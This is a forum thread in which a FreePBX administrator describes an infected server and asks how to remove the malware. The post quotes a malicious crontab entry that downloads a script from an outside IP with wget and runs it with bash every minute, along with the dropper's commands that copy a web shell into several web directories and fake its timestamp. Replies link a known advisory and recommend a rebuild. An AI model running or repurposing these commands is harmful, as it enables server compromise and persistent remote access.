Malicious Issue Found

So lately, I noticed an issue on my FPBX instances. I go to log into the GUI and manage whatever I am in there to manage. After I navigate around a few pages, I get the warning at the top of the page that a module has been tampered with and I need to run:

fwconsole ma refreshsignatures

I do that and it finds tampered files associated with Framework. It downloads and installs it and after I do a chown and reload, I refresh the page and it’s fine again. Then I log in after a few days, and the same process happens again. I recently performed all of the updates, which also updated the framework version, so I assumed it was a fix applied with that patch to address that issue. I didn’t think much of it, but I may have stumbled onto a bigger issue. On one of the servers on which I run FPBX (all cloud hosted), I ran a script monthly to compile call recordings into a tar file that I can download. I went to investigate why it hadn’t run for last month, starting with the crontab I entered, and instead of seeing the script I entered in there, I saw this:

*/1  * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

Immediately my heart sank. This is obviously malicious, but I’m not even sure how or where this was inserted! I looked at the script that’s copied and it copies base64 encoded data into a generic looking page (/var/www/html/admin/views/ajax.php) and then proceeds to copy this script into multiple different folders and files:

mkdir -p /var/www/html/digium_phones/
mkdir -p /var/www/html/rest_phones/
cp /var/www/html/admin/views/ajax.php /var/www/html/rest_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/modules/core/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/digium_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/js/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/ajax.php
touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php

The main problem I have is identifying this and stopping it completely. I removed it completely from the crontab, but after a few minutes, it’s added right back in. I’m not even sure how this happened; I felt like I had the firewall and SSH access tightly locked down. Any help to identify this and eradicate it would be greatly appreciated!

See K.php - a RestApps malicious script

The general consensus is that the only safe thing to do is to rebuild the system from scratch, rather than try to fix it piecemeal.


Thank you so much for linking this. I did not see this post at all!
